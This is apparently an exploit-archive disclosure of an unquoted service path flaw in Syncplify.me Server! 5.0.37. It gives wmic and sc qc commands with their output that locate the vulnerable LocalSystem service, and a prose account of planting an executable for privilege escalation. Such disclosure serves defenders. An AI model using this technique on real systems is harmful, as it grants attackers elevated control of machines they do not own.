# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path # Date: 2020-11-08 # Exploit Author: Julio AviƱa # Vendor Homepage: https://www.syncplify.me/ # Software Link: https://download.syncplify.me/SMServer_Setup.exe # Version: 5.0.37 # Tested on: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname DisplayName PathName StartMode StartName Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "SMWebRestServicev5" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SMWebRestServicev5 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5 DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.